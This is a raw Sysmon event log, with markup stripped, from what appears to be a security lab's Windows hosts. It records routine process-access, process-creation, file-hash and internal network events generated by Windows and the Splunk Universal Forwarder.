10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FA9-6216-2304-000000003902}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-0FA9-6216-2304-000000003902}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EE4FF93DD3123C1D9668DBC2BFF5936,SHA256=9D2ADAF41BDC4773C872093A64C80427512E0F84E5310C539C485460D7E448EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:47.592{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53324-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:49.180{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=925189322B00A5AFEE981F63FC08ED50,SHA256=1289F911876D5894AD1E5DF7596E35C28211D8048844E5A454963E5365C2C999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:50.350{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=397B7E7D82C1F4635EED96D67B43B715,SHA256=1C2DED477F3F4F6206402E69BAD342C3D4B96A3B5C53CC10636A6357BF88B6CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:50.350{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7477F69F6BD7CDD5BC85FF04705DE7BD,SHA256=0D0285D597DFE3E29A2D71E9A132875B352D8CE7F4D56A034231A56225773848,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:50.195{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C998A7878C44BD070DBBBA6DAC95A8B,SHA256=C91ED6919228307D470095C0B25767F1412C6103D56AC2606BBCE49390CD7375,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:50.147{4F8D34B0-0FA9-6216-2404-000000003902}40162940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.569{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1296A26E7473BC3C7B65B6D5E494EA48,SHA256=932AA16FB9DFF5BB1644000917CB8E8A567A7CAF78BCEFCEC8E0C01216CACCDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:51.211{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A225966E6EC58CD108B19B863A8B965,SHA256=8189AA5DEAA2546BB0C4A29F87CA3A2E12C111FF26FEAA6A0D0B03C679C02BE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FAB-6216-2504-000000003902}3388C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0FAB-6216-2504-000000003902}3388C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FAB-6216-2504-000000003902}3388C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:51.507{4F8D34B0-0FAB-6216-2504-000000003902}3388C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:52.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=135E9F1DEB25027022CD3EF78397DAED,SHA256=6C54F75A4E27CEAC51FB82BDD0F8E5E53CB12396810DA7348FDA1AE0A4B41B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:52.228{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A86667F1DD2883DBC0432EF4FB3E3304,SHA256=1465102DFB3E62EFB20D03E962B16C8A8E3FB5B3CB4E4044BDB81F2A7A1064AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:52.553{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B74BC8B9BF0D83D3BCE349361FE3DAB,SHA256=874EBC69ADA95D71F63347D557C17AC918E1DF12F0849A0926E8E1553E699F1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.586{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51246-false10.0.1.12-8000- 